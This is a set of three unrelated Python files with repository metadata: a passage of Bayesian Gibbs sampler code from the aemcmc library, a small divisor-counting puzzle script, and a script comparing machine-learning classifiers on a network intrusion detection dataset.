beta_posterior\n\n\nhalfcauchy_1_lv, halfcauchy_2_lv = var(), var()\nzero_lv = var()\nhorseshoe_pattern = etuple(\n etuplize(at.random.normal),\n var(),\n var(),\n var(),\n zero_lv,\n etuple(etuplize(at.mul), halfcauchy_1_lv, halfcauchy_2_lv),\n)\n\n\ndef horseshoe_match(graph: TensorVariable) -> Tuple[TensorVariable, TensorVariable]:\n graph_et = etuplize(graph)\n\n s = unify(graph_et, horseshoe_pattern)\n if s is False:\n raise ValueError(\"Not a horseshoe prior.\")\n\n halfcauchy_1 = eval_if_etuple(s[halfcauchy_1_lv])\n if halfcauchy_1.owner is None or not isinstance(\n halfcauchy_1.owner.op, type(at.random.halfcauchy)\n ):\n raise ValueError(\n \"Not a horseshoe prior. One of the shrinkage parameters \"\n + \"in your model is not half-Cauchy distributed.\"\n )\n\n halfcauchy_2 = eval_if_etuple(s[halfcauchy_2_lv])\n\n if halfcauchy_2.owner is None or not isinstance(\n halfcauchy_2.owner.op, type(at.random.halfcauchy)\n ):\n raise ValueError(\n \"Not a horseshoe prior. One of the shrinkage parameters \"\n + \"in your model is not half-Cauchy distributed.\"\n )\n\n if halfcauchy_1.type.ndim == 0 or all(s == 1 for s in halfcauchy_1.type.shape):\n lmbda_rv = halfcauchy_2\n tau_rv = halfcauchy_1\n elif halfcauchy_2.type.ndim == 0 or all(s == 1 for s in halfcauchy_2.type.shape):\n lmbda_rv = halfcauchy_1\n tau_rv = halfcauchy_2\n else:\n raise ValueError(\n \"Not a horseshoe prior. The global shrinkage parameter \"\n + \"in your model must be one-dimensional.\"\n )\n\n return (lmbda_rv, tau_rv)\n\n\ndef horseshoe_posterior(\n srng: RandomStream,\n beta: TensorVariable,\n sigma2: TensorVariable,\n lambda2: TensorVariable,\n tau2: TensorVariable,\n) -> Tuple[TensorVariable, TensorVariable]:\n r\"\"\"Gibbs kernel to sample from the posterior distributions of the horseshoe prior shrinkage parameters.\n\n This kernel generates samples from the posterior distribution of the local\n and global shrinkage parameters of a horseshoe prior, respectively :math:`\\lambda`\n and :math:`\\tau` in the following model:\n\n .. math::\n\n \\begin{align*}\n \\beta_j &\\sim \\operatorname{N}\\left(0, \\lambda_j^2 \\tau^2 \\sigma^2\\right) \\\\\n \\lambda_j &\\sim \\operatorname{C}^{+}(0, 1) \\\\\n \\tau &\\sim \\operatorname{C}^{+}(0, 1)\n \\end{align*}\n\n The graphs constructed by this function are :math:`\\lambda \\mid \\beta, \\tau` and\n :math:`\\tau \\mid \\lambda`, respectively.\n\n We use the following observations [1]_ to sample from the posterior\n conditional probability of :math:`\\tau` and :math:`\\lambda`:\n\n 1. The half-Cauchy distribution can be intepreted as a mixture of inverse-gamma\n distributions;\n 2. If :math:`Z \\sim \\operatorname{InvGamma}(1, a)`, :math:`Z \\sim 1 / \\operatorname{Exp}(a)`.\n\n Parameters\n ----------\n srng\n The random number generating object to be used during sampling.\n beta\n Regression coefficients.\n sigma2\n Variance of the regression coefficients.\n lambda2\n Square of the local shrinkage parameters.\n tau2\n Square of the global shrinkage parameters.\n\n Returns\n -------\n Posteriors for :math:`lambda` and :math:`tau`, respectively.\n\n References\n ----------\n .. [1] Makalic, Enes & Schmidt, Daniel. (2016). High-Dimensional Bayesian\n Regularised Regression with the BayesReg Package.\n\n \"\"\"\n lmbda2_inv = at.reciprocal(lambda2)\n tau2_inv = at.reciprocal(tau2)\n\n upsilon_inv = srng.exponential(1 + lmbda2_inv)\n zeta_inv = srng.exponential(1 + tau2_inv)\n\n beta2 = beta**2\n lambda2_inv_new = srng.exponential(upsilon_inv + 0.5 * beta2 * tau2_inv / sigma2)\n tau2_inv_new = srng.gamma(\n 0.5 * (beta.shape[0] + 1),\n zeta_inv + 0.5 * (beta2 * lambda2_inv_new).sum() / sigma2,\n )\n\n lambda2_update = at.reciprocal(at.sqrt(lambda2_inv_new))\n tau2_update = at.reciprocal(at.sqrt(tau2_inv_new))\n\n return lambda2_update, tau2_update\n\n\nclass HorseshoeGibbsKernel(SamplingStep):\n \"\"\"An `Op` that represents a state update with the FFBS sampler.\"\"\"\n\n\n@sampler_finder([NormalRV])\ndef normal_horseshoe_finder(fgraph, node, srng):\n r\"\"\"Find and construct a Gibbs sampler for the normal-Horseshoe model.\n\n The implementation follows the sampler described in [1]_. It is designed to\n sample efficiently from the following model:\n\n .. math::\n\n \\begin{align*}\n \\beta_i &\\sim \\operatorname{N}(0, \\lambda_i^2 \\tau^2) \\\\\n \\lambda_i &\\sim \\operatorname{C}^{+}(0, 1) \\\\\n \\tau &\\sim \\operatorname{C}^{+}(0, 1)\n \\end{align*}\n\n References\n ----------\n .. [1] Makalic, Enes & Schmidt, Daniel. (2015). A Simple Sampler for the\n Horseshoe Estimator. 10.1109/LSP.2015.2503725.\n\n \"\"\"\n\n rv_var = node.outputs[1]\n\n try:\n lambda_rv, tau_rv = horseshoe_match(node.outputs[1])\n except ValueError: # pragma: no cover\n return None\n\n tau2 = tau_rv**2\n lambda2 = lambda_rv**2\n lambda_posterior, tau_posterior = horseshoe_posterior(\n srng, rv_var, at.as_tensor(1.0), lambda2, tau2\n )\n\n # Build an `Op` for the sampling kernel\n outputs = [lambda_posterior, tau_posterior]\n inputs = remove_constants([rv_var, lambda2, tau2])\n gibbs = HorseshoeGibbsKernel(inputs, outputs)\n\n lambda_posterior, tau_posterior = gibbs(*inputs)\n lambda_posterior.name = f\"{lambda_rv.name or 'lambda'}_posterior\"\n tau_posterior.name = f\"{tau_rv.name or 'tau'}_posterior\"\n\n return [(lambda_rv, lambda_posterior, None), (tau_rv, tau_posterior, None)]\n\n\ngibbs_db.register(\"normal_horseshoe\", normal_horseshoe_finder, \"basic\")\n\n\nX_lv = var()\nbeta_lv = var()\nneg_one_lv = var()\n\nsigmoid_dot_pattern = etuple(\n etuplize(at.sigmoid),\n etuple(etuplize(at.mul), neg_one_lv, etuple(etuple(Dot), X_lv, beta_lv)),\n)\n\na_lv = var()\nb_lv = var()\ngamma_pattern = etuple(etuplize(at.random.gamma), var(), var(), var(), a_lv, b_lv)\n\n\ndef gamma_match(graph: TensorVariable) -> Tuple[TensorVariable, TensorVariable]:\n graph_et = etuplize(graph)\n s = unify(graph_et, gamma_pattern)\n if s is False:\n raise ValueError(\"Not a gamma prior.\")\n\n a = eval_if_etuple(s[a_lv])\n b = eval_if_etuple(s[b_lv])\n\n return a, b\n\n\nh_lv = var()\nnbinom_sigmoid_dot_pattern = etuple(\n etuplize(at.random.nbinom), var(), var(), var(), h_lv, sigmoid_dot_pattern\n)\n\n\ndef nbinom_sigmoid_dot_match(\n graph: TensorVariable,\n) -> Tuple[TensorVariable, TensorVariable, TensorVariable]:\n graph_et = etuplize(graph)\n s = unify(graph_et, nbinom_sigmoid_dot_pattern)\n if s is False:\n raise ValueError(\"Not a negative binomial regression.\")\n\n if all(s[neg_one_lv].data != -1):\n raise ValueError(\n \"Not a negative binomial regression. The argument to \"\n + \"the sigmoid must be minus the dot product.\"\n )\n\n h = eval_if_etuple(s[h_lv])\n beta_rv = eval_if_etuple(s[beta_lv])\n X = eval_if_etuple(s[X_lv])\n\n return X, h, beta_rv\n\n\ndef sample_CRT(\n srng: RandomStream, y: TensorVariable, h: TensorVariable\n) -> Tuple[TensorVariable, Mapping[Variable, Variable]]:\n r\"\"\"Sample a Chinese Restaurant Process value: :math:`l \\sim \\operatorname{CRT}(y, h)`.\n\n Sampling is performed according to the following:\n\n .. math::\n\n \\begin{gather*}\n l = \\sum_{n=1}^{y} b_n, \\quad\n b_n \\sim \\operatorname{Bern}\\left(\\frac{h}{n - 1 + h}\\right)\n \\end{gather*}\n\n References\n ----------\n .. [1] Zhou, Mingyuan, and Lawrence Carin. 2012. “Augment-and-Conquer Negative Binomial Processes.” Advances in Neural Information Processing Systems 25.\n\n \"\"\"\n\n def single_sample_CRT(y_i: TensorVariable, h: TensorVariable):\n n_i = at.arange(2, y_i + 1)\n return at.switch(y_i < 1, 0, 1 + srng.bernoulli(h / (n_i - 1 + h)).sum())\n\n res, updates = aesara.scan(\n single_sample_CRT,\n sequences=[y.ravel()],\n non_sequences=[h],\n strict=True,\n )\n res = res.reshape(y.shape)\n res.name = \"CRT sample\"\n\n return res, updates\n\n\ndef nbinom_dispersion_posterior(\n srng: RandomStream,\n h: TensorVariable,\n p: TensorVariable,\n a: TensorVariable,\n b: TensorVariable,\n y: TensorVariable,\n) -> Tuple[TensorVariable, Mapping[Variable, Variable]]:\n r\"\"\"Sample the conditional posterior for the dispersion parameter under a negative-binomial and gamma prior.\n\n In other words, this draws a sample from :math:`h \\mid Y = y` per\n\n .. math::\n\n \\begin{align*}\n Y_i &\\sim \\operatorname{NB}(h, p_i) \\\\\n h &\\sim \\operatorname{Gamma}(a, b)\n \\end{align*}\n\n where :math:`\\operatorname{NB}` is a negative-binomial distribution.\n\n The conditional posterior sample step is derived from the following decomposition:\n\n .. math::\n \\begin{gather*}\n Y_i = \\sum_{j=1}^{l_i} u_{i j}, \\quad u_{i j} \\sim \\operatorname{Log}(p_i), \\quad\n l_i \\sim \\operatorname{Pois}\\left(-h \\log(1 - p_i)\\right)\n \\end{gather*}\n\n where :math:`\\operatorname{Log}` is the logarithmic distribution. Under a\n gamma prior, :math:`h` is conjugate to :math:`l`. We draw samples from\n :math:`l` according to :math:`l \\sim \\operatorname{CRT(y, h)}`, where\n :math:`y` is a sample from :math:`y \\sim Y`.\n\n The resulting posterior is\n\n .. math::\n\n \\begin{gather*}\n \\left(h \\mid Y = y\\right) \\sim \\operatorname{Gamma}\\left(a + \\sum_{i=1}^N l_i, \\frac{1}{1/b + \\sum_{i=1}^N \\log(1 - p_i)} \\right)\n \\end{gather*}\n\n Parameters\n ----------\n srng\n The random number generator from which samples are drawn.\n h\n The value of :math:`h`.\n p\n The success probability parameter in the negative-binomial distribution of :math:`Y`.\n a\n The shape parameter in the :math:`\\operatorname{Gamma}` prior on :math:`h`.\n b\n The rate parameter in the :math:`\\operatorname{Gamma}` prior on :math:`h`.\n y\n A sample from :math:`Y`.\n\n Returns\n -------\n A sample from the posterior :math:`h \\mid y`.\n\n References\n ----------\n .. [1] Zhou, Mingyuan, Lingbo Li, David Dunson, and Lawrence Carin. 2012.\n “Lognormal and Gamma Mixed Negative Binomial Regression.”\n Proceedings of the International Conference on Machine Learning.\n 2012: 1343–50. https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4180062/.\n\n \"\"\"\n Ls, updates = sample_CRT(srng, y, h)\n L_sum = Ls.sum(axis=-1)\n h_posterior = srng.gamma(\n a + L_sum, at.reciprocal(b) - at.sum(at.log(1 - p), axis=-1)\n )\n\n return h_posterior, updates\n\n\ndef nbinom_normal_posterior(srng, beta, beta_std, X, h, y):\n r\"\"\"Produce a Gibbs sample step for a negative binomial logistic-link regression with a normal prior.\n\n The implementation follows the sampler described in [1]_. It is designed to\n sample efficiently from the following negative binomial regression model:\n\n .. math::\n\n \\begin{align*}\n Y &\\sim \\operatorname{NB}\\left(h, p\\right) \\\\\n p &= \\frac{\\exp(\\psi)}{1 + \\exp(\\psi)} \\\\\n \\psi &= X^\\top \\beta \\\\\n \\beta &\\sim \\operatorname{N}(0, \\lambda^2) \\\\\n \\end{align*}\n\n where :math:`\\operatorname{NB}` is a negative-binomial distribution.\n\n Parameters\n ----------\n srng\n The random number generator from which samples are drawn.\n beta\n The current/previous value of the regression parameter :math:`beta`.\n beta_std\n The std. dev. of the regression parameter :math:`beta`.\n X\n The regression matrix.\n h\n The :math:`h` parameter in the negative-binomial distribution of :math:`Y`.\n y\n A sample from the observation distribution :math:`y \\sim Y`.\n\n Returns\n -------\n A sample from the posterior :math:`\\beta \\mid y`.\n\n Notes\n -----\n The :math:`z` expression in Section 2.2 of [1]_ seems to\n omit division by the Polya-Gamma auxilliary variables whereas [2]_ and [3]_\n explicitly include it. We found that including the division results in\n accurate posterior samples for the regression coefficients. It is also\n worth noting that the :math:`\\sigma^2` parameter is not sampled directly\n in the negative binomial regression problem and thus set to 1 [2]_.\n\n References\n ----------\n .. [1] Makalic, Enes & Schmidt, Daniel. (2015). A Simple Sampler for the\n Horseshoe Estimator. 10.1109/LSP.2015.2503725.\n .. [2] Makalic, Enes & Schmidt, Daniel. (2016). High-Dimensional Bayesian\n Regularised Regression with the BayesReg Package.\n .. [3] Neelon, Brian. (2019). Bayesian Zero-Inflated Negative Binomial\n Regression Based on Pólya-Gamma Mixtures. Bayesian Anal.\n 2019 September ; 14(3): 829–855. doi:10.1214/18-ba1132.\n\n \"\"\"\n\n # This effectively introduces a new term, `w`, to the model.\n # TODO: We could/should generate a graph that uses this scale-mixture\n # \"expanded\" form and find/create the posteriors from there\n w = srng.gen(polyagamma, y + h, X @ beta)\n z = 0.5 * (y - h) / w\n\n tau_beta = at.reciprocal(beta_std)\n\n beta_posterior = normal_regression_posterior(srng, w, tau_beta, X, z)\n\n return beta_posterior\n\n\nclass NBRegressionGibbsKernel(SamplingStep):\n \"\"\"An `Op` that represents the update of the regression parameter of\n a negative binomial regression.\n\n \"\"\"\n\n default_output = 0\n\n\nclass DispersionGibbsKernel(SamplingStep):\n \"\"\"An `Op` that represents the state update for the dispersion parameter\n of a negative binomial in a negative binomial regression.\n\n \"\"\"\n\n default_output = 0\n\n\n@sampler_finder([NegBinomialRV])\ndef nbinom_logistic_finder(fgraph, node, srng):\n r\"\"\"Find and construct a Gibbs sampler for a negative-binomial logistic-link regression.\n\n The implementation follows the sampler described in `nbinom_normal_posterior`. It is designed to\n sample efficiently from the following negative binomial regression model:\n\n .. math::\n\n \\begin{align*}\n Y &\\sim \\operatorname{NB}\\left(h, p\\right) \\\\\n p &= \\frac{\\exp(\\psi)}{1 + \\exp(\\psi)} \\\\\n \\psi &= X^\\top \\beta \\\\\n \\beta_j &\\sim \\operatorname{N}(0, \\lambda_j^2) \\\\\n h \\sim \\operatorname{Gamma}\\left(a, b\\right)\n \\end{align*}\n\n If :math:`h` doesn't take the above form, a sampler is produced with steps\n for all the other terms; otherwise, sampling for :math:`h` is performed\n in accordance with [1]_.\n\n References\n ----------\n .. [1] Zhou, Mingyuan, Lingbo Li, David Dunson, and Lawrence Carin. 2012.\n Lognormal and Gamma Mixed Negative Binomial Regression.\n Proceedings of the International Conference on Machine Learning.\n 2012: 1343–50. https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4180062/.\n\n \"\"\"\n\n y = node.outputs[1]\n\n try:\n X, h, beta_rv = nbinom_sigmoid_dot_match(node.outputs[1])\n except ValueError: # pragma: no cover\n return None\n\n beta_std = beta_rv.owner.inputs[4]\n beta_posterior = nbinom_normal_posterior(srng, beta_rv, beta_std, X, h, y)\n\n # Build the `Op` corresponding to the sampling step\n outputs = [beta_posterior]\n inputs = remove_constants([beta_rv, beta_std, X, h, y])\n gibbs = NBRegressionGibbsKernel(inputs, outputs)\n\n beta_posterior = gibbs(*inputs)\n beta_posterior.name = f\"{beta_rv.name or 'beta'}_posterior\"\n\n res: List[\n Tuple[TensorVariable, TensorVariable, Optional[Mapping[Variable, Variable]]]\n ] = [(beta_rv, beta_posterior, None)]\n\n # TODO: Should this be in a separate rewriter?\n try:\n a, b = gamma_match(h)\n except ValueError: # pragma: no cover\n return res\n\n p = at.sigmoid(-X @ beta_posterior)\n\n h_posterior, updates = nbinom_dispersion_posterior(srng, h, p, a, b, y)\n\n # Build the `Op` corresponding to the sampling step\n update_outputs = [h_posterior.owner.inputs[0].default_update]\n update_outputs.extend(updates.values())\n\n outputs = [h_posterior] + update_outputs\n inputs = remove_constants([h, p, a, b, y])\n gibbs = DispersionGibbsKernel(inputs, outputs)\n\n h_posterior = gibbs(*inputs)\n h_posterior.name = f\"{h.name or 'h'}_posterior\"\n\n updates_offset = len(inputs)\n updates = {\n h_posterior.owner.inputs[updates_offset]: h_posterior.owner.outputs[1],\n h_posterior.owner.inputs[updates_offset + 1]: h_posterior.owner.outputs[2],\n }\n\n res.append((h, h_posterior, updates))\n\n return res\n\n\ngibbs_db.register(\"nbinom_logistic_regression\", nbinom_logistic_finder, \"basic\")\n\n\nbernoulli_sigmoid_dot_pattern = etuple(\n etuplize(at.random.bernoulli), var(), var(), var(), sigmoid_dot_pattern\n)\n\n\ndef bern_sigmoid_dot_match(\n graph: TensorVariable,\n) -> Tuple[TensorVariable, TensorVariable]:\n graph_et = etuplize(graph)\n\n s = unify(graph_et, bernoulli_sigmoid_dot_pattern)\n if s is False:\n raise ValueError(\"Not a Bernoulli regression.\")\n\n if all(s[neg_one_lv].data != -1):\n raise ValueError(\n \"Not a Bernoulli regression. The argument to the sigmoid \"\n + \"must be minus the dot product.\"\n )\n\n beta_rv = eval_if_etuple(s[beta_lv])\n X = eval_if_etuple(s[X_lv])\n\n return X, beta_rv\n\n\ndef bern_normal_posterior(\n srng: RandomStream,\n beta: TensorVariable,\n beta_std: TensorVariable,\n X: TensorVariable,\n y: TensorVariable,\n) -> Tuple[TensorVariable, TensorVariable, TensorVariable]:\n r\"\"\"Produce a Gibbs sample step for a bernoulli logistic-link regression with a normal prior.\n\n The implementation follows the sampler described in [1]_. It is designed to\n sample efficiently from the following binary logistic regression model:\n\n .. math::\n\n \\begin{align*}\n Y &\\sim \\operatorname{Bern}\\left( p \\right) \\\\\n p &= \\frac{1}{1 + \\exp\\left( -X^\\top \\beta\\right)} \\\\\n \\beta_j &\\sim \\operatorname{N}\\left( 0, \\lambda_j^2 \\right)\n \\end{align*}\n\n\n Parameters\n ----------\n beta\n The current/previous value of the regression parameter :math:`beta`.\n beta_std\n The std. dev. of the regression parameter :math:`beta`.\n X\n The regression matrix.\n y\n A sample from the observation distribution :math:`y \\sim Y`.\n\n Returns\n -------\n A sample from :math:`\\beta \\mid y`.\n\n References\n ----------\n .. [1] Makalic, Enes & Schmidt, Daniel. (2016). High-Dimensional Bayesian\n Regularised Regression with the BayesReg Package.\n\n \"\"\"\n w = srng.gen(polyagamma, 1, X @ beta)\n z = (y - 0.5) / w\n\n tau_beta = at.reciprocal(beta_std)\n\n beta_posterior = normal_regression_posterior(srng, w, tau_beta, X, z)\n\n return beta_posterior\n\n\nclass BernoulliRegressionGibbsKernel(SamplingStep):\n \"\"\"An `Op` that represents the update of the regression parameter of\n a Bernoulli regression.\n\n \"\"\"\n\n default_output = 0\n\n\n@sampler_finder([BernoulliRV])\ndef bern_logistic_finder(fgraph, node, srng):\n r\"\"\"Find and construct a Gibbs sampler for a negative binomial logistic-link regression.\"\"\"\n\n y = node.outputs[1]\n\n try:\n X, beta_rv = bern_sigmoid_dot_match(node.outputs[1])\n except ValueError: # pragma: no cover\n return None\n\n beta_std = beta_rv.owner.inputs[4]\n beta_posterior = bern_normal_posterior(srng, beta_rv, beta_std, X, y)\n\n # Build the `Op` corresponding to the sampling step\n outputs = [beta_posterior]\n inputs = remove_constants([beta_rv, beta_std, X, y])\n gibbs = BernoulliRegressionGibbsKernel(inputs, outputs)\n\n beta_posterior: TensorVariable = gibbs(*inputs) # type: ignore\n beta_posterior.name = f\"{beta_rv.name or 'beta'}_posterior\" # type: ignore\n\n return [(beta_rv, beta_posterior, None)]\n\n\ngibbs_db.register(\"bern_logistic_finder\", bern_logistic_finder, \"basic\")\n\nsampler_finder_db.register(\n \"gibbs_db\", in2out(gibbs_db.query(\"+basic\"), name=\"gibbs\"), \"basic\"\n)\n","repo_name":"aesara-devs/aemcmc","sub_path":"aemcmc/gibbs.py","file_name":"gibbs.py","file_ext":"py","file_size_in_byte":24238,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"52"} +{"seq_id":"8869603704","text":"from math import sqrt\ndef getNumDiv(x):\n t=int(sqrt(x))\n cnt=0\n for i in range(1,t+1):\n if x%i==0:\n cnt+=1\n cnt*=2\n if t**2==x:\n cnt-=1\n return cnt\n\n\ndef getWeakness(x):\n cnt=0\n target=getNumDiv(x)\n for i in range(1,x):\n if getNumDiv(i)>target:\n cnt+=1\n return cnt\n\n\ndef weakNumbers(n):\n res=list()\n for i in range(1,n+1):\n res.append(getWeakness(i))\n minWeak=max(res)\n numWeak=res.count(minWeak)\n print(res)\n return [minWeak,numWeak]\n\nprint(weakNumbers(9))\n","repo_name":"seansio1995/codefights","sub_path":"weakNum.py","file_name":"weakNum.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10120911089","text":"# import libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# loading data\ntrain = pd.read_csv(\"Train_data.csv\")\ntest = pd.read_csv(\"Test_data.csv\")\n\n# checking the dimensions of the datasets\n\nprint(f\"Training :: {train.shape}\")\nprint(f\"Testing :: {test.shape}\")\n\ntrain.head()\n\ntrain.info()\n\ntest.head()\n\n### Data Analysis\n\n# statistical summary \n\ntrain.describe()\n\ntrain.describe(include='object')\n\n# unique types of flag\n\nflag = train['flag'].unique()\nflag\n\nplt.figure(figsize=(15, 3))\nvalues = train['flag'].value_counts()\nplt.bar(flag, values)\n\n# unique types of protocol_type\n\nprotocol_types = train['protocol_type'].unique()\nprotocol_types\n\nplt.figure(figsize=(10, 5))\nvalues = train['protocol_type'].value_counts()\nplt.bar(protocol_types, values)\n\n# most used data : tcp, then udp, then icmp\n\n# unique types of service\n\nservice = train['service'].unique()\nservice\n\nplt.figure(figsize=(15, 3))\nvalues = train['service'].value_counts()\nplt.bar(service, values)\n\n# unique types of class\nclass_attack = train['class'].unique()\nclass_attack\n\n# Missing Values\nmissing_values = train.isnull().sum()\nmissing_values\n\n# Checking for any duplicates\nprint(f\"No. of duplicate rows :: {train.duplicated().sum()}\")\n\n# dropping redundant columns in both train and test set\ntrain.drop(['num_outbound_cmds'], axis=1, inplace=True)\ntest.drop(['num_outbound_cmds'], axis=1, inplace=True)\n\n# attack distribution\ntrain[\"class\"].value_counts()\n\nclass_type = train['class'].unique()\nplt.figure(figsize=(7, 5))\nvalues = train['class'].value_counts()\nplt.bar(class_type, values)\n\n#### Data Preprocessing\n\n# feature scaling => scale cols numerical values to have 0 or 1 values\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\n\ncol = train.select_dtypes(include=['int64', 'float64']).columns\ncols = test.select_dtypes(include=['int64', 'float64']).columns\n\nsc_train = scaler.fit_transform(train.select_dtypes(include=['int64', 'float64']))\nsc_test = scaler.fit_transform(test.select_dtypes(include=['int64', 'float64']))\n\nstd_train = pd.DataFrame(sc_train, columns=col)\nstd_test = pd.DataFrame(sc_test, columns=cols)\n\nstd_train.head()\n\nstd_test.head()\n\n# One-Hot Ecoding => dealing with categorical values\nfrom sklearn.preprocessing import LabelEncoder\n\nencoder = LabelEncoder()\n\n# extracting categorical variables from both train and test datasets\ncattrain = train.select_dtypes(include=['object']).copy()\ncattest = test.select_dtypes(include=['object']).copy()\n\n# encoding categorical values\nen_train = cattrain.apply(encoder.fit_transform)\nen_test = cattest.apply(encoder.fit_transform)\n\nen_Ytrain = en_train[['class']].copy()\n\n# drop the target column => class\nen_train = en_train.drop(['class'], axis=1)\n\n##### Categorical values in train dataset before and after encoding\nprint(cattrain.head()) # categorical data before encoding\nprint('--------------------')\nprint(en_train.head()) # encoded categorical data\n\n###### Categorical values in test dataset before and after encoding\nprint(cattest.head()) # categorical data before encoding\nprint('--------------------')\nprint(en_test.head()) # encoded categorical data\n\n# Join the preprocessed categorical and numeric values\n\n# train\ntrain_X = pd.concat([std_train, en_train], axis=1)\ntrain_y = en_Ytrain\n\n# test\ntest = pd.concat([std_test, en_test], axis=1)\n\ntrain_X.head()\n\ntrain_y.head()\n\ntest.head()\n\n### MODEL\n\n# Split The Dataset\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, Y_train, Y_test = train_test_split(train_X, train_y, train_size=0.70,\n random_state=2)\n\nX_train.head(3)\n\nY_train.head(3)\n\nX_test.head(5)\n\nY_test.head(5)\n\n\n#### FITTING THE MODEL\n\n# Data => train_X, train_y, test\n\n# import libraries\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn import tree\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\n\nimport time\n\n# Train KNeighborsClassifier Model\nKNN_classifier = KNeighborsClassifier()\nstart_time = time.time()\nKNN_classifier.fit(X_train, Y_train)\nend_time = time.time()\nKNN_train_time = end_time - start_time\nprint(\"Training time :: \", KNN_train_time)\n\n# Testing time for KNN\nstart_time = time.time()\ny_test_pred = KNN_classifier.predict(X_train)\nend_time = time.time()\nKNN_test_time = end_time - start_time\nprint(\"Testing time: \", KNN_test_time)\n\n# Train LogisticRegression Model\nLGR_classifier = LogisticRegression(random_state=0)\nstart_time = time.time()\nLGR_classifier.fit(X_train, Y_train)\nend_time = time.time()\nLGR_train_time = end_time - start_time\nprint(\"Training time :: \", LGR_train_time)\n\n# Testing time for LGR\nstart_time = time.time()\ny_test_pred = LGR_classifier.predict(X_train)\nend_time = time.time()\nLGR_test_time = end_time - start_time\nprint(\"Testing time: \", LGR_test_time)\n\n# Train Gaussian Naive Baye Model\nBNB_classifier = BernoulliNB()\nstart_time = time.time()\nBNB_classifier.fit(X_train, Y_train)\nend_time = time.time()\nBNB_train_time = end_time - start_time\nprint(\"Training time :: \", BNB_train_time)\n\n# Testing time for Naive Baye\nstart_time = time.time()\ny_test_pred = BNB_classifier.predict(X_train)\nend_time = time.time()\nBNB_test_time = end_time - start_time\nprint(\"Testing time: \", BNB_test_time)\n\n# Train Decision Tree Model\nDTC_classifier = tree.DecisionTreeClassifier(random_state=0)\nstart_time = time.time()\nDTC_classifier.fit(X_train, Y_train)\nend_time = time.time()\nDTC_train_time = end_time - start_time\nprint(\"Training time :: \", DTC_train_time)\n\n# Testing time for DT\nstart_time = time.time()\ny_test_pred = DTC_classifier.predict(X_train)\nend_time = time.time()\nDTC_test_time = end_time - start_time\nprint(\"Testing time: \", DTC_test_time)\n\n# Train Random Forest Model\nfrom sklearn.ensemble import RandomForestClassifier\n\nRFC_classifier = RandomForestClassifier(n_estimators=30)\nstart_time = time.time()\nRFC_classifier.fit(X_train, Y_train)\nend_time = time.time()\nRFC_train_time = end_time - start_time\nprint(\"Training time: \", RFC_train_time)\n\n# Testing time for RF\nstart_time = time.time()\ny_test_pred = RFC_classifier.predict(X_train)\nend_time = time.time()\nRFC_test_time = end_time - start_time\nprint(\"Testing time: \", RFC_test_time)\n\n# Training Time\nnames = ['KNN', 'LR', 'NB', 'DT', 'RF']\nvalues = [KNN_train_time, LGR_train_time, BNB_train_time, DTC_train_time, RFC_train_time]\nplt.figure(figsize=(10, 5), num=20)\nplt.bar(names, values)\n\n# Testing Time\nnames = ['KNN', 'LR', 'NB', 'DT', 'RF']\nvalues = [KNN_test_time, LGR_test_time, BNB_test_time, DTC_test_time, RFC_test_time]\nplt.figure(figsize=(10, 5), num=20)\nplt.bar(names, values)\n\n#### EVALUATING THE MODEL -- train data\n\nfrom sklearn import metrics\n\nmodels = []\nmodels.append(('KNeighborsClassifier', KNN_classifier))\nmodels.append(('LogisticRegression', LGR_classifier))\nmodels.append(('Naive Baye Classifier', BNB_classifier))\nmodels.append(('Decision Tree Classifier', DTC_classifier))\nmodels.append(('Random Forest Classifier', RFC_classifier))\n\nfor i, val in models:\n scores = cross_val_score(val, X_train, Y_train, cv=10)\n accuracy = metrics.accuracy_score(Y_train, val.predict(X_train))\n confusion_matrix = metrics.confusion_matrix(Y_train, val.predict(X_train))\n classification = metrics.classification_report(Y_train, val.predict(X_train))\n\n print()\n print('============================== {} Model Evaluation =============================='.format(i))\n print()\n print(\"Cross Validation Mean Score:\" \"\\n\", scores.mean())\n print()\n print(\"Model Accuracy:\" \"\\n\", accuracy)\n print()\n print(\"Confusion matrix:\" \"\\n\", confusion_matrix)\n print()\n print(\"Classification report:\" \"\\n\", classification)\n print()\n\n#### VALIDATING THE MODEL -- test data\n\nfor i, val in models:\n accuracy = metrics.accuracy_score(Y_test, val.predict(X_test))\n confusion_matrix = metrics.confusion_matrix(Y_test, val.predict(X_test))\n classification = metrics.classification_report(Y_test, val.predict(X_test))\n print()\n print('============================== {} Model Test Results =============================='.format(i))\n print()\n print(\"Model Accuracy:\" \"\\n\", accuracy)\n print()\n print(\"Confusion matrix:\" \"\\n\", confusion_matrix)\n print()\n print(\"Classification report:\" \"\\n\", classification)\n print()\n\n# Training Accuracy\nnames = ['KNN', 'LR', 'NB', 'DT', 'RF']\nvalues = [99.38, 95.52, 90.72, 100.0, 100.0]\nplt.figure(figsize=(10, 5), num=20)\nplt.bar(names, values)\n\n# Testing Accuracy\nnames = ['KNN', 'LR', 'NB', 'DT', 'RF']\nvalues = [99.17, 95.51, 90.67, 99.39, 99.68]\nplt.figure(figsize=(10, 5), num=20)\nplt.bar(names, values)\n\n#### PREDICTING => using the test dataset\n\n# PREDICTING FOR TEST DATA using KNN\nknn_pred = KNN_classifier.predict(test)\nNB_pred = BNB_classifier.predict(test)\nlog_pred = LGR_classifier.predict(test)\ndt_pred = DTC_classifier.predict(test)\nrf_pred = RFC_classifier.predict(test)\n\n# Testing for first row\nfor i, val in models:\n print(\"For model: \", i)\n print(\"Expected: \", Y_test.iloc[0], \"Predicted: \", val.predict(X_test).reshape(1, -1)[0][0])\n print()\n\n# Testing for second row\nfor i, val in models:\n print(\"For model: \", i)\n print(\"Expected: \", Y_test.iloc[1], \"\\tPredicted: \", val.predict(X_test).reshape(1, -1)[0][1])\n print()\n\n# Testing for five row\nfor i, val in models:\n print(\"For model: \", i)\n print(\"Expected: \", Y_test.iloc[4], \"\\tPredicted: \", val.predict(X_test).reshape(1, -1)[0][4])\n print()\n\n# 